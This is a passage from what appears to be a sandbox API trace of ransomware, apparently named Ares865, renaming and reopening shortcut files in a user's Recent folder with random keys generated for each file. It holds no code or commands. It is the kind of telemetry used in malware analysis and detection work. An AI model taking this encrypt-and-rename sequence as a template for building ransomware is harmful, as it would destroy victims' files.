CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.326] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0093.327] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0093.327] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.328] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\JSuwEr1Q.lnk.Ares865") returned 57 [0093.328] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\JSuwEr1Q.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\jsuwer1q.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\JSuwEr1Q.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\jsuwer1q.lnk.ares865"), dwFlags=0x1) returned 1 [0093.329] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\JSuwEr1Q.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\jsuwer1q.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.330] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=5067) returned 1 [0093.330] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0093.330] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0093.330] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.331] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0093.331] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0093.332] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.333] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\k6UG-T Dnf_9VJ.lnk.Ares865") returned 63 [0093.333] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\k6UG-T Dnf_9VJ.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\k6ug-t dnf_9vj.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\k6UG-T Dnf_9VJ.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\k6ug-t dnf_9vj.lnk.ares865"), dwFlags=0x1) returned 1 [0093.337] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\k6UG-T Dnf_9VJ.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\k6ug-t dnf_9vj.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.337] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1030) returned 1 [0093.337] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0093.338] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0093.338] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.338] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0093.339] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0093.339] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.341] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\KrNSz.lnk.Ares865") returned 54 [0093.341] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\KrNSz.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\krnsz.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\KrNSz.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\krnsz.lnk.ares865"), dwFlags=0x1) returned 1 [0093.342] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\KrNSz.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\krnsz.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.342] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=5030) returned 1 [0093.343] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0093.343] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0093.343] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.344] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0093.353] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0093.353] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.354] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\kxEsWhdONxLwt2.flv.lnk.Ares865") returned 67 [0093.354] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\kxEsWhdONxLwt2.flv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\kxeswhdonxlwt2.flv.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\kxEsWhdONxLwt2.flv.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\kxeswhdonxlwt2.flv.lnk.ares865"), dwFlags=0x1) returned 1 [0093.355] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\kxEsWhdONxLwt2.flv.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\kxeswhdonxlwt2.flv.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.356] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=5351) returned 1 [0093.356] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0093.356] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0093.357] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.357] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0093.358] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0093.358] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.359] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\LEuxzM9RptD5X-.mkv.lnk.Ares865") returned 67 [0093.359] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\LEuxzM9RptD5X-.mkv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\leuxzm9rptd5x-.mkv.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\LEuxzM9RptD5X-.mkv.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\leuxzm9rptd5x-.mkv.lnk.ares865"), dwFlags=0x1) returned 1 [0093.360] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\LEuxzM9RptD5X-.mkv.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\leuxzm9rptd5x-.mkv.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.361] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1030) returned 1 [0093.361] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0093.361] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0093.361] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.362] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0093.363] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0093.363] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.364] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\lFURsmj.lnk.Ares865") returned 56 [0093.364] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\lFURsmj.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\lfursmj.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\lFURsmj.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\lfursmj.lnk.ares865"), dwFlags=0x1) returned 1 [0093.365] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\lFURsmj.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\lfursmj.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.366] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=6871) returned 1 [0093.366] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0093.367] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0093.367] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.367] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0093.368] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0093.368] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.369] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\Lkp05OAqm_.lnk.Ares865") returned 59 [0093.369] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\Lkp05OAqm_.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\lkp05oaqm_.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\Lkp05OAqm_.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\lkp05oaqm_.lnk.ares865"), dwFlags=0x1) returned 1 [0093.370] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\Lkp05OAqm_.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\lkp05oaqm_.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.370] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=5089) returned 1 [0093.371] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0093.371] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0093.371] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.372] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0093.372] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0093.373] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.374] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\Lsvi1lMhoE5SRGd.flv.lnk.Ares865") returned 68 [0093.374] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\Lsvi1lMhoE5SRGd.flv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\lsvi1lmhoe5srgd.flv.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\Lsvi1lMhoE5SRGd.flv.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\lsvi1lmhoe5srgd.flv.lnk.ares865"), dwFlags=0x1) returned 1 [0093.375] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\Lsvi1lMhoE5SRGd.flv.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\lsvi1lmhoe5srgd.flv.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.375] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3858) returned 1 [0093.375] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0093.376] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0093.376] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.377] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0093.378] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0093.378] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.379] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\LZ2RCElVo7ukMe1fhw.lnk.Ares865") returned 67 [0093.379] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\LZ2RCElVo7ukMe1fhw.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\lz2rcelvo7ukme1fhw.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\LZ2RCElVo7ukMe1fhw.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\lz2rcelvo7ukme1fhw.lnk.ares865"), dwFlags=0x1) returned 1 [0093.380] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\LZ2RCElVo7ukMe1fhw.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\lz2rcelvo7ukme1fhw.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.381] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1050) returned 1 [0093.381] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0093.381] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0093.381] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.382] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0093.382] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0093.382] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.384] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\M0NM3.lnk.Ares865") returned 54 [0093.384] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\M0NM3.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\m0nm3.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\M0NM3.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\m0nm3.lnk.ares865"), dwFlags=0x1) returned 1 [0093.385] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\M0NM3.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\m0nm3.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.385] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2560) returned 1 [0093.385] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0093.386] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0093.386] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.386] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0093.387] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0093.387] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.388] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\m2ZYm 34gdRwNd41 cMV.mkv.lnk.Ares865") returned 73 [0093.389] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\m2ZYm 34gdRwNd41 cMV.mkv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\m2zym 34gdrwnd41 cmv.mkv.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\m2ZYm 34gdRwNd41 cMV.mkv.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\m2zym 34gdrwnd41 cmv.mkv.lnk.ares865"), dwFlags=0x1) returned 1 [0093.390] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\m2ZYm 34gdRwNd41 cMV.mkv.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\m2zym 34gdrwnd41 cmv.mkv.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.390] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1003) returned 1 [0093.390] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0093.391] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0093.391] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.391] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0093.392] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0093.392] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.393] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\mfYE2jthnbv WVhiisR.lnk.Ares865") returned 68 [0093.393] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\mfYE2jthnbv WVhiisR.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\mfye2jthnbv wvhiisr.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\mfYE2jthnbv WVhiisR.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\mfye2jthnbv wvhiisr.lnk.ares865"), dwFlags=0x1) returned 1 [0093.394] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\mfYE2jthnbv WVhiisR.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\mfye2jthnbv wvhiisr.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.395] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3719) returned 1 [0093.395] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0093.396] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0093.396] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.397] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0093.397] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0093.397] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.399] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\MVuwqaGtdA.flv.lnk.Ares865") returned 63 [0093.399] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\MVuwqaGtdA.flv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\mvuwqagtda.flv.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\MVuwqaGtdA.flv.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\mvuwqagtda.flv.lnk.ares865"), dwFlags=0x1) returned 1 [0093.400] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\MVuwqaGtdA.flv.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\mvuwqagtda.flv.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.400] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=8383) returned 1 [0093.400] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0093.401] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0093.401] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.402] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0093.403] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0093.403] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.404] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\My Music.lnk.Ares865") returned 57 [0093.404] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\My Music.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\my music.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\My Music.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\my music.lnk.ares865"), dwFlags=0x1) returned 1 [0093.405] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\My Music.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\my music.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, 